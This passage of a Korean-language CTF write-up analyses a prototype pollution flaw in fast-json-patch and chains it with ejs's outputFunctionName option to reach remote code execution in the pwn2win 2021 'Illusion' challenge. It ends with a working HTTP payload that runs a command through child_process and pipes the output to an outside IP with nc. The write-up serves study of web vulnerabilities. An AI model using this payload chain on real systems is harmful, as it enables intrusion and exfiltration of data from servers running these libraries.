helpers_js_1._deepClone(removed);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">var</span> originalValue = applyOperation(<span class="built_in">document</span>, &#123; <span class="attr">op</span>: <span class="string">&quot;remove&quot;</span>, <span class="attr">path</span>: <span class="built_in">this</span>.from &#125;).removed;</span><br><span class="line">        applyOperation(<span class="built_in">document</span>, &#123; <span class="attr">op</span>: <span class="string">&quot;add&quot;</span>, <span class="attr">path</span>: <span class="built_in">this</span>.path, <span class="attr">value</span>: originalValue &#125;);</span><br><span class="line">        <span class="keyword">return</span> &#123; <span class="attr">newDocument</span>: <span class="built_in">document</span>, <span class="attr">removed</span>: removed &#125;;</span><br><span class="line">    &#125;,</span><br><span class="line">    copy: <span class="function"><span class="keyword">function</span> (<span class="params">obj, key, <span class="built_in">document</span></span>) </span>&#123;</span><br><span class="line">        <span class="keyword">var</span> valueToCopy = getValueByPointer(<span class="built_in">document</span>, <span class="built_in">this</span>.from);</span><br><span class="line">        <span class="comment">// enforce copy by value so further operations don&#x27;t affect source (see issue #177)</span></span><br><span class="line">        applyOperation(<span class="built_in">document</span>, &#123; <span class="attr">op</span>: <span class="string">&quot;add&quot;</span>, <span class="attr">path</span>: <span class="built_in">this</span>.path, <span class="attr">value</span>: helpers_js_1._deepClone(valueToCopy) &#125;);</span><br><span class="line">        <span class="keyword">return</span> &#123; <span class="attr">newDocument</span>: <span class="built_in">document</span> &#125;;</span><br><span class="line">    &#125;,</span><br><span class="line">    test: <span class="function"><span class="keyword">function</span> (<span class="params">obj, key, <span class="built_in">document</span></span>) </span>&#123;</span><br><span class="line">        <span class="keyword">return</span> &#123; <span class="attr">newDocument</span>: <span class="built_in">document</span>, <span class="attr">test</span>: _areEquals(obj[key], <span class="built_in">this</span>.value) &#125;;</span><br><span class="line">    &#125;,</span><br><span class="line">    _get: <span class="function"><span class="keyword">function</span> (<span class="params">obj, key, <span class="built_in">document</span></span>) </span>&#123;</span><br><span class="line">        <span class="built_in">this</span>.value = obj[key];</span><br><span class="line">        <span class="keyword">return</span> &#123; <span class="attr">newDocument</span>: <span class="built_in">document</span> &#125;;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>
<p><code>objOps</code>를 보면 내부에 여러 함수들이 정의되어 있는 것을 볼 수 있다. <code>키:값</code>을 추가, 삭제, 리플레이스, 이동, 복사 등 등을 할 수 있는 것으로 보이고, 무엇을 실행할 지는 <code>objOps</code>에 인자로 넘어온 값을  통해서 판단하고 있다.</p>
<p>우리는 연산자로 <code>replace</code>를 보냈다.</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">replace: <span class="function"><span class="keyword">function</span> (<span class="params">obj, key, <span class="built_in">document</span></span>) </span>&#123;</span><br><span class="line">    <span class="keyword">var</span> removed = obj[key];</span><br><span class="line">    obj[key] = <span class="built_in">this</span>.value;</span><br><span class="line">    <span class="keyword">return</span> &#123; <span class="attr">newDocument</span>: <span class="built_in">document</span>, <span class="attr">removed</span>: removed &#125;;</span><br><span class="line">&#125;,</span><br></pre></td></tr></table></figure>
<p><code>replace()</code> 메서드를 확인해보면 key의 값을 <code>value</code>를 넣어주고 있는 것을 볼 수 있고, 바로 여기서 <code>Prototype Pollution</code> 취약점이 발생한다.</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> a = &#123;&#125;;</span><br><span class="line"><span class="keyword">const</span> patch = [&#123;<span class="attr">op</span>: <span class="string">&quot;replace&quot;</span>, <span class="attr">path</span>: <span class="string">&quot;/constructor/prototype/polluted&quot;</span>, <span class="attr">value</span>: <span class="string">&quot;Prototype Pollution&quot;</span>&#125;];</span><br><span class="line">fastjsonpatch.applyPatch(a, patch);</span><br></pre></td></tr></table></figure>
<p>우리는 위처럼 <code>path</code> 값을 전송을 했다. 그러니 내부 오퍼레이션에 의해서 와일문을 돌고, 제일 마지막 번째에서는 마치 <code>a[&#39;constructor&#39;][&#39;prototype&#39;][&#39;polluted&#39;]</code>와 같이 작동을 하게 되어 <code>Prototype Pollution</code>이 발생한다.</p>
<hr>
<h2 id="Exploit-Web-pwn2win-CTF-2021-152-pts"><a href="#Exploit-Web-pwn2win-CTF-2021-152-pts" class="headerlink" title="Exploit (Web) pwn2win CTF 2021 [152 pts]"></a>Exploit (Web) pwn2win CTF 2021 [152 pts]</h2><p>이번 주말에는 <code>pwn2win CTF 2021</code>이라는 대회가 열렸는데 해당 대회에서 웹 문제 중에 솔브가 제일 많은 문제가 <code>Prototype Pollution to RCE in ejs</code>를 이용한 문제였다. 하지만 삽질 실수를 해서 <code>Prototype Pollution</code> 공격을 하지 못 했고, 대회가 끝나고 롸업을 본 후에 <code>npm</code> 공식 사이트를 보니 거의 중간에 답이 있어서 매우 아쉬운 문제다.</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">FROM node:alpine</span><br><span class="line"></span><br><span class="line">EXPOSE 1337</span><br><span class="line"></span><br><span class="line"># copy flag</span><br><span class="line">COPY flag.txt &#x2F;root&#x2F;flag.txt</span><br><span class="line"></span><br><span class="line"># copy readflag binary (it just reads the flag)</span><br><span class="line">COPY readflag &#x2F;</span><br><span class="line">RUN chmod 4755 &#x2F;readflag</span><br><span class="line"></span><br><span class="line"># install web application</span><br><span class="line">COPY src &#x2F;app</span><br><span class="line">RUN cd &#x2F;app &amp;&amp; npm install</span><br><span class="line"></span><br><span class="line"># change to guest user</span><br><span class="line">USER 405</span><br><span class="line"></span><br><span class="line"># run application and stay alive for 5 minutes</span><br><span class="line">COPY entrypoint.sh &#x2F; </span><br><span class="line">ENTRYPOINT &#x2F;entrypoint.sh</span><br></pre></td></tr></table></figure>
<p>도커 파일을 확인해보면 <code>/readflag</code>라는 바이너리 파일을 실행 시키면 될 거 같다.</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> express = <span class="built_in">require</span>(<span class="string">&#x27;express&#x27;</span>)</span><br><span class="line"><span class="keyword">const</span> bodyParser = <span class="built_in">require</span>(<span class="string">&#x27;body-parser&#x27;</span>)</span><br><span class="line"><span class="keyword">const</span> jsonpatch = <span class="built_in">require</span>(<span class="string">&#x27;fast-json-patch&#x27;</span>)</span><br><span class="line"><span class="keyword">const</span> ejs = <span class="built_in">require</span>(<span class="string">&#x27;ejs&#x27;</span>)</span><br><span class="line"><span class="keyword">const</span> basicAuth = <span class="built_in">require</span>(<span class="string">&#x27;express-basic-auth&#x27;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> app = express()</span><br><span class="line"></span><br><span class="line"><span class="comment">// Middlewares //</span></span><br><span class="line">app.use(bodyParser.json())</span><br><span class="line">app.use(basicAuth(&#123;</span><br><span class="line">    users: &#123; <span class="string">&quot;admin&quot;</span>: process.env.SECRET || <span class="string">&quot;admin&quot;</span> &#125;,</span><br><span class="line">    challenge: <span class="literal">true</span></span><br><span class="line">&#125;))</span><br><span class="line"></span><br><span class="line"><span class="comment">/////////////////</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">let</span> services = &#123;</span><br><span class="line">    status: <span class="string">&quot;online&quot;</span>,</span><br><span class="line">    cameras: <span class="string">&quot;online&quot;</span>,</span><br><span class="line">    doors: <span class="string">&quot;online&quot;</span>,</span><br><span class="line">    dome: <span class="string">&quot;online&quot;</span>,</span><br><span class="line">    turrets: <span class="string">&quot;online&quot;</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// Static folder</span></span><br><span class="line">app.use(<span class="string">&quot;/static&quot;</span>, express.static(__dirname + <span class="string">&quot;/static&quot;</span>));</span><br><span class="line"></span><br><span class="line"><span class="comment">// Homepage</span></span><br><span class="line">app.get(<span class="string">&quot;/&quot;</span>, <span class="keyword">async</span> (req, res) =&gt; &#123;</span><br><span class="line">    <span class="keyword">const</span> html = <span class="keyword">await</span> ejs.renderFile(__dirname + <span class="string">&quot;/templates/index.ejs&quot;</span>, &#123;services&#125;)</span><br><span class="line">    res.end(html)</span><br><span class="line">&#125;)</span><br><span class="line"></span><br><span class="line"><span class="comment">// API</span></span><br><span class="line">app.post(<span class="string">&quot;/change_status&quot;</span>, <span class="function">(<span class="params">req, res</span>) =&gt;</span> &#123;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">let</span> patch = []</span><br><span class="line"></span><br><span class="line">    <span class="built_in">Object</span>.entries(req.body).forEach(<span class="function">(<span class="params">[service, status]</span>) =&gt;</span> &#123;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> (service === <span class="string">&quot;status&quot;</span>)&#123;</span><br><span class="line">            res.status(<span class="number">400</span>).end(<span class="string">&quot;Cannot change all services status&quot;</span>)</span><br><span class="line">            <span class="keyword">return</span></span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        patch.push(&#123;</span><br><span class="line">            <span class="string">&quot;op&quot;</span>: <span class="string">&quot;replace&quot;</span>,</span><br><span class="line">            <span class="string">&quot;path&quot;</span>: <span class="string">&quot;/&quot;</span> + service,</span><br><span class="line">            <span class="string">&quot;value&quot;</span>: status</span><br><span class="line">        &#125;)</span><br><span class="line">    &#125;);</span><br><span class="line"></span><br><span class="line">    jsonpatch.applyPatch(services, patch)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (<span class="string">&quot;offline&quot;</span> <span class="keyword">in</span> <span class="built_in">Object</span>.values(services))&#123;</span><br><span class="line">        services.status = <span class="string">&quot;offline&quot;</span></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    res.json(services)</span><br><span class="line">&#125;)</span><br><span class="line"></span><br><span class="line">app.listen(<span class="number">1337</span>, <span class="function">() =&gt;</span> &#123;</span><br><span class="line">    <span class="built_in">console</span>.log(<span class="string">`App listening at port 1337`</span>)</span><br><span class="line">&#125;)  </span><br></pre></td></tr></table></figure>
<p>서버 측 코드를 확인해보면 <code>/change_status</code>에서 json으로 값을 받아와서 patch 배열에 입력값을 푸쉬한 후에 <code>applyPatch()</code> 메서드에 인자로 넘겨주는 것을 볼 수 있다. 이 뒤로는 위 분석을 통해 충분히 확인하였으니 따로 부연 설명은 생략.</p>
<p>그럼 <code>Prototype Pollution</code>은 성공했지만 RCE를 어떻게 발생시켜야 할 지 확인 해야한다.</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Homepage</span></span><br><span class="line">app.get(<span class="string">&quot;/&quot;</span>, <span class="keyword">async</span> (req, res) =&gt; &#123;</span><br><span class="line">    <span class="keyword">const</span> html = <span class="keyword">await</span> ejs.renderFile(__dirname + <span class="string">&quot;/templates/index.ejs&quot;</span>, &#123;services&#125;)</span><br><span class="line">    res.end(html)</span><br><span class="line">&#125;)</span><br></pre></td></tr></table></figure>
<p>index를 보면 ejs의 <code>renderFile()</code> 메서드를 이용해서 템플릿을 반환하는 것을 볼 수 있다.</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">exports</span>.renderFile = <span class="function"><span class="keyword">function</span> (<span class="params"></span>) </span>&#123;</span><br><span class="line">  <span class="keyword">var</span> args = <span class="built_in">Array</span>.prototype.slice.call(<span class="built_in">arguments</span>);</span><br><span class="line">  <span class="keyword">var</span> filename = args.shift();</span><br><span class="line">  <span class="keyword">var</span> cb;</span><br><span class="line">  <span class="keyword">var</span> opts = &#123;<span class="attr">filename</span>: filename&#125;;</span><br><span class="line">  <span class="keyword">var</span> data;</span><br><span class="line">  <span class="keyword">var</span> viewOpts;</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Do we have a callback?</span></span><br><span class="line">  <span class="keyword">if</span> (<span class="keyword">typeof</span> <span class="built_in">arguments</span>[<span class="built_in">arguments</span>.length - <span class="number">1</span>] == <span class="string">&#x27;function&#x27;</span>) &#123;</span><br><span class="line">    cb = args.pop();</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="comment">// Do we have data/opts?</span></span><br><span class="line">  <span class="keyword">if</span> (args.length) &#123;</span><br><span class="line">    <span class="comment">// Should always have data obj</span></span><br><span class="line">    data = args.shift();</span><br><span class="line">    <span class="comment">// Normal passed opts (data obj + opts obj)</span></span><br><span class="line">    <span class="keyword">if</span> (args.length) &#123;</span><br><span class="line">      <span class="comment">// Use shallowCopy so we don&#x27;t pollute passed in opts obj with new vals</span></span><br><span class="line">      utils.shallowCopy(opts, args.pop());</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// Special casing for Express (settings + opts-in-data)</span></span><br><span class="line">    <span class="keyword">else</span> &#123;</span><br><span class="line">      <span class="comment">// Express 3 and 4</span></span><br><span class="line">      <span class="keyword">if</span> (data.settings) &#123;</span><br><span class="line">        <span class="comment">// Pull a few things from known locations</span></span><br><span class="line">        <span class="keyword">if</span> (data.settings.views) &#123;</span><br><span class="line">          opts.views = data.settings.views;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">if</span> (data.settings[<span class="string">&#x27;view cache&#x27;</span>]) &#123;</span><br><span class="line">          opts.cache = <span class="literal">true</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">// Undocumented after Express 2, but still usable, esp. for</span></span><br><span class="line">        <span class="comment">// items that are unsafe to be passed along with data, like `root`</span></span><br><span class="line">        viewOpts = data.settings[<span class="string">&#x27;view options&#x27;</span>];</span><br><span class="line">        <span class="keyword">if</span> (viewOpts) &#123;</span><br><span class="line">          utils.shallowCopy(opts, viewOpts);</span><br><span class="line">        &#125;</span><br><span class="line">      &#125;</span><br><span class="line">      <span class="comment">// Express 2 and lower, values set in app.locals, or people who just</span></span><br><span class="line">      <span class="comment">// want to pass options in their data. <span class="doctag">NOTE:</span> These values will override</span></span><br><span class="line">      <span class="comment">// anything previously set in settings  or settings[&#x27;view options&#x27;]</span></span><br><span class="line">      utils.shallowCopyFromList(opts, data, _OPTS_PASSABLE_WITH_DATA_EXPRESS);</span><br><span class="line">    &#125;</span><br><span class="line">    opts.filename = filename;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">else</span> &#123;</span><br><span class="line">    data = &#123;&#125;;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">return</span> tryHandleCache(opts, data, cb);</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>
<p><code>renderFile()</code> 메서드 하단을 보면 <code>tryHandleCache()</code> 메서드를 호출하는 것을 볼 수 있다.</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">tryHandleCache</span>(<span class="params">options, data, cb</span>) </span>&#123;</span><br><span class="line">  <span class="keyword">var</span> result;</span><br><span class="line">  <span class="keyword">if</span> (!cb) &#123;</span><br><span class="line">    <span class="keyword">if</span> (<span class="keyword">typeof</span> <span class="built_in">exports</span>.promiseImpl == <span class="string">&#x27;function&#x27;</span>) &#123;</span><br><span class="line">      <span class="keyword">return</span> <span class="keyword">new</span> <span class="built_in">exports</span>.promiseImpl(<span class="function"><span class="keyword">function</span> (<span class="params">resolve, reject</span>) </span>&#123;</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">          result = handleCache(options)(data);</span><br><span class="line">          resolve(result);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">catch</span> (err) &#123;</span><br><span class="line">          reject(err);</span><br><span class="line">        &#125;</span><br><span class="line">      &#125;);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span> &#123;</span><br><span class="line">      <span class="keyword">throw</span> <span class="keyword">new</span> <span class="built_in">Error</span>(<span class="string">&#x27;Please provide a callback function&#x27;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="keyword">try</span> &#123;</span><br><span class="line">      result = handleCache(options)(data);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">catch</span> (err) &#123;</span><br><span class="line">      <span class="keyword">return</span> cb(err);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    cb(<span class="literal">null</span>, result);</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p><code>tryHandleCache()</code> 메서드에서는 <code>handleCache()</code> 메서드를 호출하는 것을 볼 수 있다.</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">handleCache</span>(<span class="params">options, template</span>) </span>&#123;</span><br><span class="line">  <span class="keyword">var</span> func;</span><br><span class="line">  <span class="keyword">var</span> filename = options.filename;</span><br><span class="line">  <span class="keyword">var</span> hasTemplate = <span class="built_in">arguments</span>.length &gt; <span class="number">1</span>;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> (options.cache) &#123;</span><br><span class="line">    <span class="keyword">if</span> (!filename) &#123;</span><br><span class="line">      <span class="keyword">throw</span> <span class="keyword">new</span> <span class="built_in">Error</span>(<span class="string">&#x27;cache option requires a filename&#x27;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    func = <span class="built_in">exports</span>.cache.get(filename);</span><br><span class="line">    <span class="keyword">if</span> (func) &#123;</span><br><span class="line">      <span class="keyword">return</span> func;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> (!hasTemplate) &#123;</span><br><span class="line">      template = fileLoader(filename).toString().replace(_BOM, <span class="string">&#x27;&#x27;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">else</span> <span class="keyword">if</span> (!hasTemplate) &#123;</span><br><span class="line">    <span class="comment">// istanbul ignore if: should not happen at all</span></span><br><span class="line">    <span class="keyword">if</span> (!filename) &#123;</span><br><span class="line">      <span class="keyword">throw</span> <span class="keyword">new</span> <span class="built_in">Error</span>(<span class="string">&#x27;Internal EJS error: no file name or template &#x27;</span></span><br><span class="line">                    + <span class="string">&#x27;provided&#x27;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    template = fileLoader(filename).toString().replace(_BOM, <span class="string">&#x27;&#x27;</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  func = <span class="built_in">exports</span>.compile(template, options);</span><br><span class="line">  <span class="keyword">if</span> (options.cache) &#123;</span><br><span class="line">    <span class="built_in">exports</span>.cache.set(filename, func);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> func;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p><code>handleCache()</code> 메서드에서는 <code>export.compile()</code> 메서드를 또 호출한다.</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">exports</span>.compile = <span class="function"><span class="keyword">function</span> <span class="title">compile</span>(<span class="params">template, opts</span>) </span>&#123;</span><br><span class="line">  <span class="keyword">var</span> templ;</span><br><span class="line"></span><br><span class="line">  <span class="comment">// v1 compat</span></span><br><span class="line">  <span class="comment">// &#x27;scope&#x27; is &#x27;context&#x27;</span></span><br><span class="line">  <span class="comment">// <span class="doctag">FIXME:</span> Remove this in a future version</span></span><br><span class="line">  <span class="keyword">if</span> (opts &amp;&amp; opts.scope) &#123;</span><br><span class="line">    <span class="keyword">if</span> (!scopeOptionWarned)&#123;</span><br><span class="line">      <span class="built_in">console</span>.warn(<span class="string">&#x27;`scope` option is deprecated and will be removed in EJS 3&#x27;</span>);</span><br><span class="line">      scopeOptionWarned = <span class="literal">true</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> (!opts.context) &#123;</span><br><span class="line">      opts.context = opts.scope;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">delete</span> opts.scope;</span><br><span class="line">  &#125;</span><br><span class="line">  templ = <span class="keyword">new</span> Template(template, opts);</span><br><span class="line">  <span class="keyword">return</span> templ.compile();</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>
<p><code>export.compile()</code> 메서드에서는 <code>Tempalte()</code>이라는 객체를 생성자를 이용해서 생성하고, 생성한 템플릿 객체로 <code>compile()</code> 메서드를 실행하는 것을 볼 수 있다. ejs 모듈 내부는 처음보는데 아마 이 <code>Template()</code> 객체가 웹 프론트 단에 출력되는 부분인 거 같다. </p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">compile: <span class="function"><span class="keyword">function</span> (<span class="params"></span>) </span>&#123;</span><br><span class="line">  <span class="comment">/** <span class="doctag">@type <span class="type">&#123;string&#125;</span> </span>*/</span></span><br><span class="line">  ...</span><br><span class="line">  <span class="keyword">if</span> (!<span class="built_in">this</span>.source) &#123;</span><br><span class="line">    <span class="built_in">this</span>.generateSource();</span><br><span class="line">    prepended +=</span><br><span class="line">      <span class="string">&#x27;  var __output = &quot;&quot;;\n&#x27;</span> +</span><br><span class="line">      <span class="string">&#x27;  function __append(s) &#123; if (s !== undefined &amp;&amp; s !== null) __output += s &#125;\n&#x27;</span>;</span><br><span class="line">    <span class="keyword">if</span> (opts.outputFunctionName) &#123;</span><br><span class="line">      prepended += <span class="string">&#x27;  var &#x27;</span> + opts.outputFunctionName + <span class="string">&#x27; = __append;&#x27;</span> + <span class="string">&#x27;\n&#x27;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">  ...</span><br></pre></td></tr></table></figure>
<p><code>compile()</code> 메서드를 확인 해보면 <code>outputFunctionName</code>을 이용해서 문자열을 만드는 것을 볼 수 있다. 즉, 우리는 <code>applyPatch()</code>에서 발생하는 <code>Prototype Pollution</code> 취약점을 이용해서 <code>compile()</code> 메서드에서 사용되는 <code>outputFunctionName</code> 값을 잘 조작해 문자열을 맞춰 RCE를 발생시켜야 한다.</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">POST &#x2F;change_status HTTP&#x2F;1.1</span><br><span class="line">Host: illusion.pwn2win.party:44211</span><br><span class="line">Cache-Control: max-age&#x3D;0</span><br><span class="line">Authorization: Basic YWRtaW46cXp0bG5mdXlzZXVxeWpmaQ&#x3D;&#x3D;</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br><span class="line">User-Agent: Mozilla&#x2F;5.0 (Windows NT 10.0; Win64; x64) AppleWebKit&#x2F;537.36 (KHTML, like Gecko) Chrome&#x2F;90.0.4430.212 Safari&#x2F;537.36</span><br><span class="line">Accept: text&#x2F;html,application&#x2F;xhtml+xml,application&#x2F;xml;q&#x3D;0.9,image&#x2F;avif,image&#x2F;webp,image&#x2F;apng,*&#x2F;*;q&#x3D;0.8,application&#x2F;signed-exchange;v&#x3D;b3;q&#x3D;0.9</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Accept-Language: ko-KR,ko;q&#x3D;0.9,en-US;q&#x3D;0.8,en;q&#x3D;0.7</span><br><span class="line">Cookie: _ga&#x3D;GA1.2.687081227.1622238128; _gid&#x3D;GA1.2.492571223.1622429990</span><br><span class="line">Content-Type: application&#x2F;json</span><br><span class="line">Connection: close</span><br><span class="line">Content-Length: 155</span><br><span class="line"></span><br><span class="line">&#123;</span><br><span class="line">    &quot;constructor&#x2F;prototype&#x2F;outputFunctionName&quot;: &quot;_; process.mainModule.require(&#39;child_process&#39;).execSync(&#39;.&#x2F;readflag | nc 141.164.52.207 80&#39;);&#x2F;&#x2F;&quot;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>그래서 위와 같이 값을 보내 <code>Prototype Pollution</code>을 이용해서 <code>outputFunctionName</code>의 값을 <code>value</code> 값으로 오염을 시켜주었다.</p>
